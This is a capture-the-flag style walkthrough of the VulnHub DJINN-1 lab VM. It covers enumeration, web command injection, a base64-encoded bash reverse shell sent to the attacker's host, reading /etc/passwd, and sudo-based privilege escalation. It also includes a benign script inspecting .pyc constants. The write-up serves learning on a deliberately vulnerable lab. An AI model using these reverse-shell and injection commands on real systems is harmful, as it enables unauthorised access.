Wednesday, November 10, 2021

DJINN-1

- Layout for this exercise:



1 - INTRODUCTION

The goal of this exercise is to develop a hacking process for the vulnerable machine DJINN-1 from the VulnHub pentesting platform.

- DJINN-1 can be downloaded from here:

https://www.vulnhub.com/entry/djinn-1,397/

- Once DJINN-1 has been downloaded and imported into VirtualBox:

2 - ENUMERATION

- Scanning with Nmap, we learn that ports 21, 1337 and 7331 are open:



- FTP allows Anonymous login. Also, there are 3 text files available:



- Port 1337 holds a math game:

- Port 7331 runs a web server:

- Connecting to the FTP server, we find the 3 text files:

- Getting creds.txt, game.txt and message.txt:

- Reading the 3 files:

- Connecting with a web browser to port 7331:

- Dirbusting port 7331, we find the web pages genie and wish:

- Connecting to genie:

- Connecting to wish:

- Executing the command id:

- The server redirects to the web page genie and outputs the answer in the URL:

- Same thing for command pwd:

- Same thing for command ls:

3 - EXPLOITATION

- One potential attack vector would be to execute a bash command remotely through the wish web page.

- The bash command is encoded with base64:

- Setting up a nc listener on port 4444:

- Entering the following command into wish; it base64-decodes the payload and pipes it to bash:

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTUvNDQ0NCAwPiYxCg== | base64 -d | bash



- Finally, a remote shell comes back to Kali:

- Removing the annoying duplicated characters with the command stty -echo:

- Improving the shell:


- There are home folders for users nitish and sam:

- Exploring nitish's home folder, we find user.txt, but access is denied:

- Reading app.py, we find a line pointing to nitish's credentials:

- So the folder .dev holds the file creds.txt with credentials for user nitish:

4 - CAPTURING THE 1st FLAG

- Now, the 1st flag is available:



5 - PRIVILEGE ESCALATION

- There are different ways to achieve privilege escalation; we will try two of them:

5.1 - Sudoers

- Checking sudo privileges, we learn that nitish can run the command genie as user sam:

- Checking the file type of genie, we discover it has the setuid bit set:

- Discovering how genie works:

- Passing some inputs to command genie:

- Finally, we are able to get a shell as user sam:



- Checking sam's sudo privileges, he can run the command lago as root:



- Running command lago with different inputs:

- Checking the file .pyc, we find that it's a compiled Python bytecode script:

- Also, opening .pyc, we find a lot of words reminiscent of lago:



- So it seems reasonable to think there could be a close relationship between lago and .pyc. Maybe they are the same thing?

- In order to study the file in depth, let's transfer .pyc from DJINN-1 to Kali:

- Installing the decompiler uncompyle6:

- Decompiling .pyc, we find that it actually corresponds to the script lago, and there are a couple of lines that give us the answer needed to get a /bin/sh shell:


- So, entering the word num as the answer, we finally get a root shell:


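As an added illustration of the .pyc step above (not part of the original write-up, and not the real lago source), the script below compiles a constructed quiz script with a hard-coded answer, checks the .pyc header, and lists the names and string constants the bytecode still carries. The defender's takeaway is that shipping only bytecode does not hide a secret answer; it assumes Python 3.7 or newer for the 16-byte header layout.

```python
import importlib.util
import marshal
import os
import py_compile
import struct
import tempfile
# Constructed stand-in for a quiz script like lago (not the real lago source):
# the hidden branch compares the answer against a hard-coded word.
SAMPLE_SOURCE = '''import random
def main():
    num = random.randint(1, 100)
    answer = input("Guess the number: ")
    if answer == "num":
        print("hidden branch reached")
    else:
        print("correct" if answer == str(num) else "wrong")
'''

def compile_sample(directory):
    """Write the constructed script and compile it to .pyc (Python 3.7+ header layout)."""
    src = os.path.join(directory, "sample.py")
    with open(src, "w") as fh:
        fh.write(SAMPLE_SOURCE)
    return py_compile.compile(src, cfile=src + "c", doraise=True,
                              invalidation_mode=py_compile.PycInvalidationMode.TIMESTAMP)

def inspect_pyc(path):
    """Check the 16-byte header, then walk the marshalled code object collecting
    every name and string constant it references (what `strings` would surface)."""
    with open(path, "rb") as fh:
        data = fh.read()
    magic, flags, _mtime, _size = struct.unpack("<4sIII", data[:16])
    if magic != importlib.util.MAGIC_NUMBER:
        raise ValueError("magic number does not match the running interpreter")
    names, strings = set(), set()
    def walk(code):
        names.update(code.co_names)
        names.update(code.co_varnames)
        for const in code.co_consts:
            if isinstance(const, str):
                strings.add(const)
            elif hasattr(const, "co_code"):  # nested function body
                walk(const)
    walk(marshal.loads(data[16:]))
    # flags == 0 means a timestamp-based pyc; names/strings show what survives compilation
    return {"flags": flags, "names": sorted(names), "strings": sorted(strings)}

def run_demo():
    with tempfile.TemporaryDirectory() as tmp:
        return inspect_pyc(compile_sample(tmp))
```

Running run_demo() shows the literal "num" and the hidden-branch message sitting in the constants, which is the same kind of leakage the decompile step above relied on.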

5.2 - Remote command injection

- Connecting with nc to port 1337, there is a math game:


- Trying a remote injection with the command pwd, the result is successful:


- Same thing with command ls:


- Same thing with command cat /etc/passwd:

- Setting up a listener on port 4444:



- Injecting this remote command, taken from:

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

- Finally, a reverse shell comes back to Kali:



6 - CAPTURING THE 2nd FLAG

- Going to the root folder:


- Reading proof.sh:

- Executing proof.sh: